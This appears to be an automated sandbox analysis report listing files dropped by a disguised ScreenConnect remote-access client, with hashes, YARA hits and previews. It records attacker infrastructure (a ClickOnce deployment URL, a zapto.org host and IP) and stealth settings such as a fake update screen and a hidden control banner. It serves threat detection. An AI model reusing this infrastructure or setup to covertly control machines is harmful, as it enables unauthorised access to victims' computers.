                                                                                                                                                                                                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1721856
                                                                                                                                                                                                                                                                  Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):601376
                                                                                                                                                                                                                                                                  Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                                  MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                  SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                                  SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                                  SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):197120
                                                                                                                                                                                                                                                                  Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                                  MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                                  SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                                  SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                                                                  SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):289
                                                                                                                                                                                                                                                                  Entropy (8bit):4.9739376290794715
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2KG6cAtsbxMHwercD:rHy2DLI4MWoj12K9cAudMHcD
                                                                                                                                                                                                                                                                  MD5:5A9944427C35328CB2D7E201CD705C32
                                                                                                                                                                                                                                                                  SHA1:C58F7761A80CC65E12CC48AD459151DD7E02B2EA
                                                                                                                                                                                                                                                                  SHA-256:333CF59F6D5E060600BD0E001643FECC11E91743A9757AB2192C4CF9B3CB6C01
                                                                                                                                                                                                                                                                  SHA-512:AF0132F5D7DA2FDC869BD4889700FB4F3A8017159931CBE7861251C1B33EA4FA28331E1059E129C4BA6AF9878A1367BA531D412AE9DC13F143EDEBC6855114D0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e......>Software is updating... Please do not turn off your computer!.
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):257
                                                                                                                                                                                                                                                                  Entropy (8bit):4.896176001960815
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJk0k:rHy2DLI4MWoj12eKfKCKxk
                                                                                                                                                                                                                                                                  MD5:C72D7889B5E0BB8AC27B83759F108BD8
                                                                                                                                                                                                                                                                  SHA1:2BECC870DB304A8F28FAAB199AE6834B97385551
                                                                                                                                                                                                                                                                  SHA-256:3B231FF84CBCBB76390BD9560246BED20B5F3182A89EAF1D691CB782E194B96E
                                                                                                                                                                                                                                                                  SHA-512:2D38A847E6DD5AD146BD46DE88B9F37075C992E50F9D04CCEF96F77A1E21F852599A57CE2360E71B99A1CCBC5E3750D37FDB747267EA58A9B76122083FB6A390
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc.
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):50133
                                                                                                                                                                                                                                                                  Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                                  MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                                  SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                                                  SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                                  SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):26722
                                                                                                                                                                                                                                                                  Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                                  MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                                  SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                                  SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                                  SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1970
                                                                                                                                                                                                                                                                  Entropy (8bit):4.690426481732819
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
                                                                                                                                                                                                                                                                  MD5:2744E91BB44E575AD8E147E06F8199E3
                                                                                                                                                                                                                                                                  SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                                                                                                                                                                                                                                                  SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                                                                                                                                                                                                                                                  SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):562
                                                                                                                                                                                                                                                                  Entropy (8bit):5.039236886420035
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOnO/k/vXbAa3xT:2dL9hK6E46YPPvH
                                                                                                                                                                                                                                                                  MD5:74FAB4625FB05141FE3EB1BCD9C6D4D0
                                                                                                                                                                                                                                                                  SHA1:5647D1629FD1E11E058C738F3CC2850B84D939AC
                                                                                                                                                                                                                                                                  SHA-256:7AA8ECCCBEECC9CC1B1664933526A142B994B40519FC2725F215CFEA24D82C49
                                                                                                                                                                                                                                                                  SHA-512:72081FA1AB773F2E670D3F4C8FC3AB2DDE4C25B603037825FC165E7293E3C025FA84AE56076E768493A054A95AD1413BBD0504FE121F337C6076D69F9E2BD819
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>popwee2.zapto.org=194.59.30.201-08%2f11%2f2024%2011%3a44%3a40</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):562
                                                                                                                                                                                                                                                                  Entropy (8bit):5.039236886420035
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOnO/k/vXbAa3xT:2dL9hK6E46YPPvH
                                                                                                                                                                                                                                                                  MD5:74FAB4625FB05141FE3EB1BCD9C6D4D0
                                                                                                                                                                                                                                                                  SHA1:5647D1629FD1E11E058C738F3CC2850B84D939AC
                                                                                                                                                                                                                                                                  SHA-256:7AA8ECCCBEECC9CC1B1664933526A142B994B40519FC2725F215CFEA24D82C49
                                                                                                                                                                                                                                                                  SHA-512:72081FA1AB773F2E670D3F4C8FC3AB2DDE4C25B603037825FC165E7293E3C025FA84AE56076E768493A054A95AD1413BBD0504FE121F337C6076D69F9E2BD819
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>popwee2.zapto.org=194.59.30.201-08%2f11%2f2024%2011%3a44%3a40</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):68096
                                                                                                                                                                                                                                                                  Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                                  MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                                  SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                                  SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                                  SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1373
                                                                                                                                                                                                                                                                  Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                                                  MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                                                  SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                                                  SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                                                  SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):847
                                                                                                                                                                                                                                                                  Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                                                  MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                                                  SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                                                  SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                                                  SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (625), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):15036
                                                                                                                                                                                                                                                                  Entropy (8bit):3.8067322020953793
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:84JqHzST41Uaa4JqHzSdd724JqHzSi+43LEv:8FqKUJFsR2FiAA
                                                                                                                                                                                                                                                                  MD5:69E0ECBD1DD4C0A6FDEABE7F213E7402
                                                                                                                                                                                                                                                                  SHA1:7A72788B4461039F28D750DBB9B5993E8D3E4A51
                                                                                                                                                                                                                                                                  SHA-256:D9F339DEFDE480286650E673FEFE904DA4D187696C2909E7A6FC8D6D380027EA
                                                                                                                                                                                                                                                                  SHA-512:6135474BF83F511E327834BF471A887158B8DCD9F593C183B62D366806BABD2EFAC608D326DF24FCA855CDE0A20F233550DE63BBD449672365355012DAA66E69
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:PLATFORM VERSION INFO.. Windows : 10.0.19045.0 (Win32NT).. Common Language Runtime : 4.0.30319.42000.. System.Deployment.dll : 4.8.4270.0 built by: NET48REL1LAST_C.. clr.dll : 4.8.4515.0 built by: NET48REL1LAST_C.. dfdll.dll : 4.8.4270.0 built by: NET48REL1LAST_C.. dfshim.dll : 10.0.19041.30000 (WinBuild.160101.0800).... SOURCES.. Deployment url : https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):117980
                                                                                                                                                                                                                                                                  Entropy (8bit):5.585720273564656
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:0aNIcT51/FXvMVNWfCXq9ymSm2o9HuzhJOvP:0FcfiVI8mt8vOvP
                                                                                                                                                                                                                                                                  MD5:4E152D84C20AB6330FF0CF47A9AF7C6D
                                                                                                                                                                                                                                                                  SHA1:018F32D833124056FCCFC200318542687D0E5565
                                                                                                                                                                                                                                                                  SHA-256:5668723C31F6726947DFEDA324B26D27F7E899647C22A4B1B2BEA935BA8A6B10
                                                                                                                                                                                                                                                                  SHA-512:2F3F6B397072B795C74C44F19012483E2785DDEE5A7F5D7E38C566EBC9A94AE084504061F697DB714B933B79824CBC6B08B7718536A19FA21D11AD8D0F8AFB79
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):197120
                                                                                                                                                                                                                                                                  Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                                  MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                                  SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                                  SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
